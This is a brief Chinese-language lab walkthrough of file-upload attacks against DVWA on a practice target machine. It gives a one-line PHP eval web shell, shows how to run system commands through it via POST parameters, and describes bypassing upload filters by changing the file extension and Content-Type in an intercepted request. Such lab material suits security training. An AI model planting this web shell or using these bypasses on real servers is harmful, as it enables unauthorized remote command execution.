在靶机中查到 IP地址,然后在本地浏览器中输入查到的IP地址,进行试验; 一句话木马:<?php @eval($_POST['v']);?> post可换成get
在桌面创建一个 .php 文件; 上传成功后,将下面得到的地址替换上面DVMA后面的地址; 得到空白网址,按F12在hackbar中进行post传参, 输入 v=system(“config”); config可以替换成任意系统命令; 即得到结果;
将桌面的.php 文件,修改成.jpg 后缀文件; 上传文件的时候抓包,在抓到的包中修改.jpg后缀为.php,进行放包; 修改地址进行访问页面,最后在hackbar中进行post传参,进行查看的最后的结果;
不进行修改的话,会出现黑频; 上传文件的时候抓包,将Content-Type这个字段改为image/jpeg或image/png 然后在将抓到的包中修改.jpg后缀为.php 修改地址进行访问页面,最后在hackbar中进行post传参,进行查看的最后的结果;
